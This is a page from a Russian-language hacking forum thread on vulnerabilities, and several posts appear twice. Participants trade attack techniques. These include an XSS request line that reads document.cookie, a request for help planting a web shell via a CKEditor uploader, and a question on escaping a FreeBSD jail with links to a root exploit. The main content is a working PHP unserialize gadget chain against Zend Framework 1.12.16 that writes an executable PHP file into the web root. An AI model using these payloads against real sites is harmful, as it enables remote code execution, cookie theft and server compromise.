Вопросы по уязвимостям - Страница 348

crlf · 21.10.2015, 16:00

Потестил немного, выяснил что подойдёт GET и POST. Главное чтобы начального слеша не было GET /--><script>alert(document.cookie);#<!-- HTTP/1.1.

NameSpace · 21.10.2015, 23:34

Увы, без начального слэша нельзя. Как понимаю, XSS-ка на странице ошибки? Попробуйте вызвать её другими методами: 404 (страница не существует), 403 (доступ запрещен), 414 (длинный URL), 413 (большой запрос), 431 (Большой заголовок, к примеру Referer) и пр.

crlf · 22.10.2015, 00:40

Пробовал, работает только без слеша. Как я понял, если слеша нет отрабатывает один обработчик, иначе другой, который кодирует цсску в хтмл сущности. Спасибо за ответы и советы, попробую дальше покопать.

crlf · 28.10.2015, 01:12

Имеется свежий PHP, CMS с использованием Zend и не фильтруемый unserialize. Помогите найти актуальный RCE вектор.

Нагуглил вариант с нулл-байтом, но он работает только на PHP <= 5.3.3

errnick2 · 29.10.2015, 09:26

помогите советом как залить шелл имея админку с ckeditor 3.4.1 (ckfinder.html) аплоадер который конвертирует и переименовывает файлы вида gallery_photo_1352189745_5098c7319b29b.jpg инклудов не нашел

crlf · 29.10.2015, 12:11

Цитата:

Сообщение от crlf

Имеется свежий PHP, CMS с использованием Zend и не фильтруемый unserialize. Помогите найти актуальный RCE вектор.

Нагуглил вариант с нулл-байтом, но он работает только на PHP <= 5.3.3

Немного подправил, теперь работает на свежих PHP. RCE только для Apache с "AddHandler php5-script .php" .

Код:

<?php
class Zend_Search_Lucene_Index_FieldInfo
{
    public $name = '<?php phpinfo(); ?>';
}
 
class Zend_Search_Lucene_Storage_Directory_Filesystem
{
    protected $_dirPath = null;
     
    public function __construct($path)
    {
        $this->_dirPath = $path;
    }
}
 
interface Zend_Pdf_ElementFactory_Interface {}
 
class Zend_Search_Lucene_Index_SegmentWriter_StreamWriter implements Zend_Pdf_ElementFactory_Interface
{
    protected $_docCount = 1;
    protected $_name = 'test.php';
    protected $_directory;
    protected $_fields;
    protected $_files;
     
    public function __construct($directory, $fields)
    {
        $this->_directory = $directory;
        $this->_fields    = array($fields);
        $this->_files     = new stdClass;
    }
}    
 
class Zend_Pdf_ElementFactory_Proxy
{
    private $_factory;
     
    public function __construct(Zend_Pdf_ElementFactory_Interface $factory)
    {
        $this->_factory = $factory;
    }
}

$directory = new Zend_Search_Lucene_Storage_Directory_Filesystem("/var/www/");
$__factory = new Zend_Search_Lucene_Index_SegmentWriter_StreamWriter($directory, new Zend_Search_Lucene_Index_FieldInfo);
$____proxy = new Zend_Pdf_ElementFactory_Proxy($__factory);
 
echo urlencode(serialize(array($____proxy)));

?>

Создаёт файл /var/www/test.php.fnm

SynQ · 29.10.2015, 12:37

crlf
Молодец! Это для какого зенда - первого или второго?
Видел еще новый способ в блоге d0znpp, но потом он его удалил.

crlf · 29.10.2015, 12:58

SynQ, забыл написать, тестил на Zend Framework 1.12.16

Tim · 01.11.2015, 01:07

Вопрос, как выйти из Jail?

Цитата:

FreeBSD 9.1-RELEASE FreeBSD 9.1-RELEASE #0 r25319: Mon Jul 15 CEST 2013 /usr/obj/usr/src/sys/LG amd64

Рут добывается с помощью http://pastebin.com/mvrVAtJw
https://rdot.org/forum/showthread.php?t=2775

Molofya · 01.11.2015, 04:30

Имеется POST XSS дырка самая простейшая:
test.ru/script.html
POST:
search=123"><h1>XSS</h1>

Все бы ничего, но при таком POST запросе сайт проверяет наличие рефа, и чтобы обязательно там был test.ru (левые домены не катят).
Вопрос. При таких условиях возможно провести XSS атаку, или в данном случае вариантов проэксплуатировать уязвимость нету?

21.10.2015, 23:34	#3472
NameSpace Регистрация: 21.12.2012 Сообщений: 146 Репутация: 52	Увы, без начального слэша нельзя. Как понимаю, XSS-ка на странице ошибки? Попробуйте вызвать её другими методами: 404 (страница не существует), 403 (доступ запрещен), 414 (длинный URL), 413 (большой запрос), 431 (Большой заголовок, к примеру Referer) и пр. __________________ На правах рекламы.

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид

21.10.2015, 16:00	#3471
crlf Регистрация: 29.09.2015 Сообщений: 101 Репутация: 17	Потестил немного, выяснил что подойдёт GET и POST. Главное чтобы начального слеша не было GET /--><script>alert(document.cookie);#<!-- HTTP/1.1.

22.10.2015, 00:40	#3473
crlf Регистрация: 29.09.2015 Сообщений: 101 Репутация: 17	Пробовал, работает только без слеша. Как я понял, если слеша нет отрабатывает один обработчик, иначе другой, который кодирует цсску в хтмл сущности. Спасибо за ответы и советы, попробую дальше покопать.

28.10.2015, 01:12	#3474
crlf Регистрация: 29.09.2015 Сообщений: 101 Репутация: 17	Имеется свежий PHP, CMS с использованием Zend и не фильтруемый unserialize. Помогите найти актуальный RCE вектор. Нагуглил вариант с нулл-байтом, но он работает только на PHP <= 5.3.3

29.10.2015, 09:26	#3475
errnick2 Регистрация: 20.02.2015 Сообщений: 4 Репутация: 0	помогите советом как залить шелл имея админку с ckeditor 3.4.1 (ckfinder.html) аплоадер который конвертирует и переименовывает файлы вида gallery_photo_1352189745_5098c7319b29b.jpg инклудов не нашел

29.10.2015, 12:37	#3477
SynQ Регистрация: 11.07.2010 Сообщений: 953 Репутация: 352	crlf Молодец! Это для какого зенда - первого или второго? Видел еще новый способ в блоге d0znpp, но потом он его удалил.

29.10.2015, 12:58	#3478
crlf Регистрация: 29.09.2015 Сообщений: 101 Репутация: 17	SynQ, забыл написать, тестил на Zend Framework 1.12.16

01.11.2015, 04:30	#3480
Molofya Регистрация: 09.07.2015 Сообщений: 21 Репутация: -1	Имеется POST XSS дырка самая простейшая: test.ru/script.html POST: search=123"><h1>XSS</h1> Все бы ничего, но при таком POST запросе сайт проверяет наличие рефа, и чтобы обязательно там был test.ru (левые домены не катят). Вопрос. При таких условиях возможно провести XSS атаку, или в данном случае вариантов проэксплуатировать уязвимость нету?